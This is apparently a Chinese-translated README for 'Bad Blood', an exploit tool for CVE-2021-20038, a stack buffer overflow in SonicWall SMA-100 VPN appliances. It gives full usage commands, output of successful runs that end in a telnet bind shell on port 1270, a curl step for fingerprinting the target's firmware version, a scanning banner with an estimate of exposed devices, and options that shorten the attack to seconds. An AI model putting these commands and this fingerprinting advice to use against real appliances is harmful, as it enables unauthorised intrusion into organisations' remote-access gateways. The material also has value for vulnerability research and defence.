Bad Blood 是针对 CVE-2021-20038 的一个漏洞利用程序,该漏洞是使用固件版本 10.2.1.x 的 SMA-100 系列系统中 httpd 二进制文件内的一个基于栈的缓冲区溢出漏洞。我在这里写了很多技术细节:
该漏洞利用程序(按当前编写方式)会在端口 1270 上打开一个 telnet 绑定 shell。连接到该 shell 的攻击者将以 nobody 身份执行操作。
albinolobster@ubuntu:/badblood$ date
Mon Jan 10 01:15:12 PM PST 2022
albinolobster@ubuntu:/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv
▄▄▄▄ ▄▄▄ ▓█████▄ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓█████▄ ▒████▄ ▒██▀ ██▌ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▒██▒ ▄██▒██ ▀█▄ ░██ █▌ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██░█▀ ░██▄▄▄▄██ ░▓█▄ ▌ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
░▓█ ▀█▓ ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
░▒▓███▀▒ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░
[+] Spinning up HTTP server [+] User did not provide an address. We'll guess it. [+] Generated 2047 base addresses [+] Generated 1046017 total addresses to search [+] Filtering addresses for double visits (thanks awesome payload!) [+] Filtered down to 235533 total addresses to search [+] Crashing all forks to reset stack to a semi-predicatable state [+] Crashing complete. Good job. Let's go do work. [+] Disabling stderr [+] Spawning 4 workers [+] Attempting to exploit the remote server. This might take quite some time. :eek: [%] Addresses Tested: 70% [] Received an HTTP callback from 10.0.0.7 at 10/Jan/2022 14:38:03 [] Now we got bad blood. Hey! 🦞 albinolobster@ubuntu:~/badblood$ telnet 10.0.0.7 1270 Trying 10.0.0.7... Connected to 10.0.0.7. Escape character is '^]'.
bash-4.2$ whoami nobody bash-4.2$ uname -a Linux sslvpn 3.13.3 #1 SMP Tue Oct 12 09:52:15 GMT 2021 i686 i686 i386 GNU/Linux bash-4.2$
## 支持的版本
| 版本 | 支持 | 已测试 | 测试目标 |
| - | - | - | - |
| 10.2.1.2-24sv | 是 | :heavy_check_mark: | SMA 500v ESX |
| 10.2.1.1-19sv | 是 | :heavy_check_mark: | SMA 500v ESX |
| 10.2.1.0-17sv | 是 | :heavy_check_mark: | SMA 500v ESX |
## 使用方法
至少,你需要提供以下内容:
* rhost:远程主机的 IP 地址
* lhost:本地主机的 IP 地址
* version:目标的版本。
请阅读稳定性说明以获取更多上下文。
一个显而易见的问题是,如何获取目标的版本?向目标发送一个简单的 `curl` 请求即可发现,他们使用版本号来对 `css` 和 `js` 进行版本管理。```
albinolobster@ubuntu:~$ curl --insecure https://10.0.0.7/cgi-bin/welcome
...
<link href='/swl_login.10.2.1.2-24sv.css' type='text/css' rel='stylesheet'>
<link href='/swl_header.10.2.1.2-24sv.css' type='text/css' rel='stylesheet'>
<link href='/sma_content_overrides.10.2.1.2-24sv.css' type='text/css' rel='stylesheet'>
<link href='/sma_login_overrides.10.2.1.2-24sv.css' type='text/css' rel='stylesheet'>
<link href="/notificationbar.10.2.1.2-24sv.css" type="text/css" rel="stylesheet">
<script src="/js/jquery.10.2.1.2-24sv.js" type="text/javascript" charset="utf-8"></script>
Metasploit 中针对 CVE-2021-20039 的模块会解析这一点,但我没有精力为这个漏洞利用也做同样的事。请注意,如果你正在扫描环境中是否存在这些设备,我认为 "Server: SonicWall SSL-VPN Web Server" 是最可靠的标识。2022 年 1 月大约有 2.2 万个。
albinolobster@ubuntu:~/badblood$ python3 badblood.py --help
▄▄▄▄ ▄▄▄ ▓█████▄ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓█████▄ ▒████▄ ▒██▀ ██▌ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▒██▒ ▄██▒██ ▀█▄ ░██ █▌ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██░█▀ ░██▄▄▄▄██ ░▓█▄ ▌ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
░▓█ ▀█▓ ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
░▒▓███▀▒ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░
usage: badblood.py [-h] --rhost RHOST [--rport RPORT] --lhost LHOST [--rversion RVERSION] [--rhostname RHOSTNAME] [--supported-versions] [--workers WORKERS] [--nocrash] [--enable-stderr] [--addr ADDR] [--top-addr TOP_ADDR]
SonicWall SMA-100 Series Stack-Buffer Overflow Exploit (CVE-2021-20038)
optional arguments: -h, --help show this help message and exit --supported-versions The list of supported SMA-100 versions --workers WORKERS The number of workers to spew the exploit --nocrash Stops the exploit from sending a series of crash payload to start --enable-stderr Enable stderr for debugging --addr ADDR Test only. If you know the crash address, go wild. --top-addr TOP_ADDR Test only. If you know the stack's top address, go wild.
required arguments: --rhost RHOST The IPv4 address to connect to --rport RPORT The port to connect to --lhost LHOST The address to connect back to --rversion RVERSION The version of the remote target --rhostname RHOSTNAME The hostname of the remote target target
### --addr 与 --top-addr 与无选项
主要有三种操作模式。第一种是预期模式(地址猜测)。后两种主要用于测试目的。
#### 我不知道任何地址!
这是默认状态,没问题!我们只需大量猜测即可。
#### 我知道栈顶的地址!
太好了!如果你能查看 maps 或施展其他魔法:```
bfa29000-bfa4a000 rw-p 00000000 00:00 0 [stack]
您可以使用 --top_addr 参数,将攻击时间缩短到几秒钟!```
albinolobster@ubuntu:/badblood$ date
Mon Jan 10 05:42:19 PM PST 2022
albinolobster@ubuntu:/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv --top-addr 3215237120
▄▄▄▄ ▄▄▄ ▓█████▄ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓█████▄ ▒████▄ ▒██▀ ██▌ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▒██▒ ▄██▒██ ▀█▄ ░██ █▌ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██░█▀ ░██▄▄▄▄██ ░▓█▄ ▌ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
░▓█ ▀█▓ ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
░▒▓███▀▒ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░
[+] Spinning up HTTP server [+] User provided the top stack address: bfa4a000 [+] Generated 511 total addresses to search [+] Filtering addresses for double visits (thanks awesome payload!) [+] Filtered down to 243 total addresses to search [+] Crashing all forks to reset stack to a semi-predicatable state [+] Crashing complete. Good job. Let's go do work. [+] Disabling stderr [+] Spawning 4 workers [+] Attempting to exploit the remote server. This might take quite some time. :eek: [%] Addresses Tested: 33% [] Received an HTTP callback from 10.0.0.7 at 10/Jan/2022 17:42:34 [] Now we got bad blood. Hey! 🦞 albinolobster@ubuntu:~/badblood$ telnet 10.0.0.7 1270 Trying 10.0.0.7... Connected to 10.0.0.7. Escape character is '^]'.
bash-4.2$ whoami nobody bash-4.2$
#### 我知道 $ebp+8 的确切地址
没问题。使用 --addr。```
albinolobster@ubuntu:~/badblood$ date
Mon Jan 10 05:48:58 PM PST 2022
albinolobster@ubuntu:~/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv --addr 3215229520